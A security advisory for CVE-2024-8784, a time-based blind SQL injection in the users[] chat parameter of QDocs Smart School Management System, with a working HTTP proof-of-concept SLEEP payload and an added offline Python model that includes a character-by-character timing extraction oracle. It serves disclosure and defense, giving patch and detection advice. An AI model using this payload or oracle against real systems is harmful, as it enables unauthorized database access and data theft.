
Security Advisory: Time-Based Blind SQL Injection in QDocs Smart School Management System

CVE: CVE-2024-8784

Date: 12 Sep 2024

Severity: Critical

Affected Product:

  • Product: QDocs Smart School Management System
  • Affected Version: Version 7.0.0 (and possibly earlier versions)

Vulnerability Type:

  • Blind SQL Injection (Time-Based)

Discovered By:

  • Jobyer Ahmed

Description:

A time-based blind SQL injection vulnerability has been discovered in the chat system of the QDocs Smart School Management System. The vulnerability exists in the users[] parameter of the /user/chat/mynewuser endpoint. An authenticated attacker with student privileges can inject SQL into the query built from that parameter. Because the endpoint does not return query results, the attacker uses the SLEEP() function to delay the server's response: an observable delay confirms that the injected SQL was executed without any data being revealed directly.

Once confirmed, the same primitive can be leveraged to infer sensitive information by making the delay conditional on the contents of the database, or to perform unauthorized actions within the database, compromising the confidentiality and integrity of the system.


Impact:

The time-based blind SQL injection allows an attacker to:

  • Execute Attacker-Controlled SQL: the injected text runs as part of the application's own query, with the database privileges of the application's account.
  • Infer Sensitive Information: by making the SLEEP() call conditional on a comparison (for example, against one character of a stored value), the attacker turns response time into a yes/no oracle and can extract data or database structure one bit at a time, even though the endpoint never displays it.
  • Compromise Data Integrity: depending on the database configuration, the injected SQL may also modify critical data, such as user accounts or records.

Attack Vector:

The attacker must be authenticated as a student user to exploit this vulnerability. By injecting SQL into the users[] parameter, the attacker crafts requests that cause deliberate delays in the server's response using SQL's SLEEP() function. Because the delay is observable in the response time, the attack works even though the endpoint returns nothing from the query itself.

Proof of Concept (PoC):

```http
POST /user/chat/mynewuser HTTP/1.1
Host: [placeholder-host]
Cookie: ci_session=93mpnv1mlhiivbkbd83c6kfd36bcjaft
Content-Length: 79
Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126"
Accept-Language: en-US
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Platform: "Linux"
Origin: https://[placeholder-host]
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://[placeholder-host]/webtest/user/chat
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

users%5B%5D=1'+AND+(SELECT+3220+FROM+(SELECT(SLEEP(5)))ZNun)+AND+'WwBM'%3d'WwBM
```

In this PoC, the URL-decoded users[] value is:

users[]=1' AND (SELECT 3220 FROM (SELECT(SLEEP(5)))ZNun) AND 'WwBM'='WwBM

Assuming the value lands inside a single-quoted literal in the application's query, the leading 1' closes that literal, the subquery calls SLEEP(5), and the trailing 'WwBM'='WwBM consumes the closing quote the application appends, so the statement stays syntactically valid. If the value is concatenated into the query, the response arrives roughly 5 seconds later than for a benign value such as users[]=1; if it were bound as a parameter, the whole string would be compared as data and no delay would occur. To rule out network jitter when reproducing, repeat the request with SLEEP(0) and with a longer delay such as SLEEP(10) and confirm that the response time tracks the requested delay.

Mitigation:

It is strongly recommended that users of the QDocs Smart School Management System:

  • Update to a release that includes the vendor's fix (available since 18 Jul 2024, see the timeline below); version 7.0.0 and earlier should be treated as affected.
  • Ensure that every value taken from request parameters, including each element of array parameters such as users[], reaches the database only through parameterized queries (bound parameters) rather than string concatenation. Input sanitization is a defense in depth measure, not a substitute for parameterization.
  • Check web server and application logs for POST requests to /user/chat/mynewuser whose body contains SQL fragments such as SLEEP( or whose response time is several seconds above the endpoint's baseline; these indicate probing with the payload above.
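The following is an added example written for this advisory; it is not code from QDocs or from the original report. It models the bug in miniature so the timing check and the fix can be run offline: a lookup that splices a user-supplied id into its SQL text (a hypothetical stand-in for how users[] is handled), the decoded PoC payload with an adjustable delay, the parameterized version of the same lookup, and a conditional-SLEEP oracle that reads a stored value out one character at a time. SQLite is used so the example is self-contained; it has no SLEEP(), so a Python function is registered under that name as a stand-in for MySQL's SLEEP(), and SQLite's unicode()/substr() stand in for MySQL's ASCII()/SUBSTRING(). The users table, its rows and the query shape are constructed here and are assumptions, not the product's schema.

```python
"""Added example, not part of the QDocs advisory or of the product's code.

Models the advisory's bug: a lookup that concatenates a user-supplied id into
SQL, the decoded time-based PoC payload, the parameterized fix, and a timing
oracle that extracts data one character at a time. SQLite has no SLEEP(), so a
Python function is registered under that name as a stand-in for MySQL's SLEEP().
The table, its rows and the query shape are constructed assumptions.
"""
import sqlite3
import time

DELAY = 0.25  # seconds; the advisory's PoC uses SLEEP(5)


def open_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    # Stand-in for MySQL SLEEP(n): block for n seconds and return 0 as MySQL does.
    conn.create_function("SLEEP", 1, lambda n: time.sleep(n) or 0)
    conn.execute("CREATE TABLE users (id TEXT, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("1", "alice"), ("2", "bob")])  # constructed sample rows
    return conn


def vulnerable_lookup(conn, user_id):
    # Assumed vulnerable shape: the users[] value is concatenated into the query.
    sql = "SELECT id, name FROM users WHERE id = '" + user_id + "'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, user_id):
    # The fix: the value is bound as a parameter, so it can only ever be data.
    return conn.execute("SELECT id, name FROM users WHERE id = ?",
                        (user_id,)).fetchall()


def timed(fn, *args):
    start = time.perf_counter()
    result = fn(*args)
    return result, time.perf_counter() - start


def sleep_payload(delay):
    # The URL-decoded PoC body with the delay made adjustable. The trailing
    # 'WwBM'='WwBM re-balances the quote the application closes after it.
    return f"1' AND (SELECT 3220 FROM (SELECT(SLEEP({delay})))ZNun) AND 'WwBM'='WwBM"


def is_time_based_injectable(lookup, conn, delay=DELAY):
    """Confirmation check: the SLEEP delay shows up in the response time."""
    _, elapsed = timed(lookup, conn, sleep_payload(delay))
    return elapsed >= delay * 0.9  # small tolerance for timer granularity


def char_greater_than(lookup, conn, pos, threshold, delay=DELAY):
    """Timing oracle: delay only if character `pos` of the first user's name > threshold."""
    # unicode()/substr() are SQLite's spellings of MySQL's ASCII()/SUBSTRING().
    cond = (f"unicode(substr((SELECT name FROM users ORDER BY id LIMIT 1), {pos}, 1))"
            f" > {threshold}")
    payload = f"1' AND (CASE WHEN {cond} THEN SLEEP({delay}) ELSE 0 END) AND 'x'='x"
    _, elapsed = timed(lookup, conn, payload)
    return elapsed >= delay * 0.9


def extract_first_name(lookup, conn, length, delay=DELAY):
    """Recover `length` characters by binary search over the oracle (7 probes each)."""
    out = []
    for pos in range(1, length + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if char_greater_than(lookup, conn, pos, mid, delay):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    db = open_db()
    print("concatenated query delayed:", is_time_based_injectable(vulnerable_lookup, db))
    print("parameterized query delayed:", is_time_based_injectable(safe_lookup, db))
    print("name leaked through timing:", extract_first_name(vulnerable_lookup, db, 5))
```

Against `vulnerable_lookup` the PoC payload delays the response and the oracle recovers the stored name without it ever appearing in a result; against `safe_lookup` the same strings are compared as a literal id, match nothing, and return immediately. The 0.9 factor on the delay comparison is a tolerance for timer granularity; in a real engagement the baseline response time is measured first and the delay chosen well above it, as the PoC does with 5 seconds.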

Timeline:

  • Initial Discovery: 8 Mar 2024
  • Vendor Notification: 8 Mar 2024
  • Vendor Response: 8 Mar 2024
  • Patch Availability: 18 Jul 2024
  • Public Disclosure: 12 Sep 2024

Acknowledgments:

The vulnerability was discovered by Jobyer Ahmed.